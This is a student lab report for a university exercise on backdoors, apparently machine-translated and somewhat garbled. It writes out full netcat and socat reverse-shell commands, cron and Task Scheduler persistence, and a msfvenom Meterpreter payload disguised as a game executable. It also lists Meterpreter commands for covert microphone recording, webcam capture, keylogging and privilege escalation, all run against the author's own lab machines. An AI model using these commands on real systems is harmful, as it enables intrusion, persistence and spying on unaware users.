2019-2020-2 20,175,321 Wuding Cheng "network technology against" back door Principles and Practice Exp2

[COOL]

2019-2020-2 20,175,321 Wuding Cheng "network technology against" back door Principles and Practice Exp2

A practice target

• Task One: Use netcat get the host operating Shell, cron start
• Task Two: Use socat get the host operating Shell, plans to start the task
• Task 3: Use MSF meterpreter (or other software) to generate an executable file, or use ncat socat to the host and run to get the host Shell
• Task 4: Use MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right

Second, the basics

• Backdoor: not through the normal certification process and the access channel system
• May exist:
  • translater
  • operating system
  • firmware
  • application
• Backdoor Workflow: Workflow back door: the program is running → → → implanted to avoid killing.
• Backdoor:
  • Netcat: is a bottom tool, the basic TCP UDP data transmitting and receiving. Use is often combined with other tools, play the role of the back door.
  • socat: socat nc is an enhanced version of the basic function is to create two socat bidirectional byte stream data is transmitted therebetween, the parameter is the address of which represents a new direction. The so-called flow represents the flow of data, and the data can have many different types, the command requires a number of options for correspondingly various types defined and described data flow.
  • Meterpreter: has powerful features, especially its socks proxy. Meterpreter is a killer Metasploit framework, usually as an attack after overflow vulnerability load use, the attack load after triggering the vulnerability can return a our control channel, for example using a vulnerability remote procedure with oh by RPC services, when a vulnerability is triggered, we choose Meterpreter as an attack load, it is possible to obtain a Meterpreter Shell on the target system is connected. Meterpreter Metasploit Framework is an extension module, you can call some of the features of Metasploit, the target system more in-depth penetration, these features include anti-tracking, memory-only mode, password hashes acquisition, elevation of privilege, a springboard for attacks.

Third, the experimental content

1. Use netcat get the host operating Shell, cron start

1.1 Use Windows to get Linux Shell

First used in Windows ipconfigto see its IP address

After turning off the firewall, use ncat.exe program to open listeningncat.exe -l -p 5321

Use the -e option to execute a shell program in kali rebound connect Windows:nc 192.168.1.18 5321 -e /bin/sh

In the windows will be able to successfully kali's shell:

1.2Linux get Windows Shell

In kali in ifconfigview of kali IP:

Use nc -l -p 5321open listening kali

Use in Windows ncat.exe -e cmd.exe 192.168.1.20 5321rebound connection kali

kali successful Windows command prompt:

1.3 start cron

Cron is timed tasks under Linux, every minute running time, preset instruction is executed according to the configuration file.

Listening port under Windows 5321, Linux system, enter the command crontab -e and select 3 to enter edit mode,

Add 21 * * * * / bin / netcat 192.168.1.18 5321 -e / bin / sh in the last row, represents 21 per hour from the instruction executed later in time-sharing.

inux connection in Windows 21 time-sharing, available shell after listening windows connection:

1.4 nc data transmission

Use ncat.exe -l 5321 5321 listening port under Windows, kali use nc 192.168.1.18 5321 rally port to connect to Windows 5321, the connection is established successfully after the two sides can transfer data to

2. Use socat get the host operating Shell, plans to start the task

Open the Computer Management after downloading socat - Task Scheduler - create a task, complete the task name and create a new trigger.

Choose your socat.exe files in the operating program or script path, add the parameter field fill tcp-listen:5321 exec:cmd.exe,pty,stderrthis role cmd.exe command is to bind to port 5317, while the cmd.exe redirect the stderr to stdout

After create a trigger, set time, set the default to other

You can see the task is already running

After reaching the trigger time, we will find the task to run automatically

In kali input instructions socat - tcp:192.168.0.102:5321can connect to port Windows 5321 host, and then you can get the Windows shell:

3. MSF meterpreter an executable file using ncat socat or transferred to the host and the host operating acquired Shell

Use kali attack win10, first executing instructions on Kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.20 LPORT=5321 -f exe > Counter-Strike20175321.exe, IP address here is kali of IP.

Execution under Windows ncat.exe -lv 5321 > Counter-Strike20175321.execommand, view the current connection status

Kali use in the nc 192.168.1.18 5321 < Counter-Strike20175321.exetransport backdoor, cmd success win10 transmission of information will appear in the transmission

Kali used on msfconsoleinstruction enters msf console, type:

use exploit/multi/handler    //使用监听模块，设置payload
set payload windows/meterpreter/reverse_tcp    //使用和生成后门程序时相同的payload
set LHOST 192.168.1.20    //kali的IP
set LPORT 5321    //要使用相同的端口

Use exploitstart listening, backdoor programs running in Windows
running under Windows backdoor in cmd, then get a shell Windows hosts on Kali.

4. Use MSF meterpreter destination host generates audio content acquisition, camera, records keystrokes, and try to privilege escalation

4.1 record_mic command input can be intercepted for a long time audio recording is completed automatically save the output path:

4.2 Input webcam_snap instructions may use the camera for photographing, the photographing is completed automatically save the output path, and automatically open the image

4.3 keyscan_start inputs and keyscan_dump target instruction fetch record keystrokes:

4.4. The instructions may be input screenshot screenshot

4.5 getsystem instruction input operation privilege escalation:

Fourth, the problems encountered in the experiment

1. Use the nc file transfer was not successful

unknown reason

Solution: No

2.corn to time does not start

Cause: The condition checked by default "Start this task only if the computer on AC power" and "If the computer to switch to battery power, stop."

Solution: plug or uncheck.

3. This application can not run on your computer

The reason: backdoor file transfer failed.

Solution: re-transmission can be.

Fifth, experiment and experience summary

1. Basic questions answered

• (1) include a back door you can think of possible ways to enter your system?
  • From software acquired non-official website
• (2) How do you know exemplified by the back door to start up (win and linux) way?
  • Timer start (for example Corn), start / restart from the start, run a program start.
• Which gives you a profound image function (3) Meterpreter there?
  • Access the camera in a case where the user is unaware of the attacked machine steal image and audio.
• (4) How to find yourself the system has not been installed back door?
  • Turn on the firewall and antivirus software, do not give the program a chance.

2. Experimental Experience

I thought this experiment would not spend so much time, but because it involves different systems monitor each other (machine), transferring data and files, often a variety of unexpected situation occurs. Not only do we need patience to analyze and solve problems one after another, but also have the courage to redo understand the nature of courage and a pair of "eyes," Oh really able to train a person.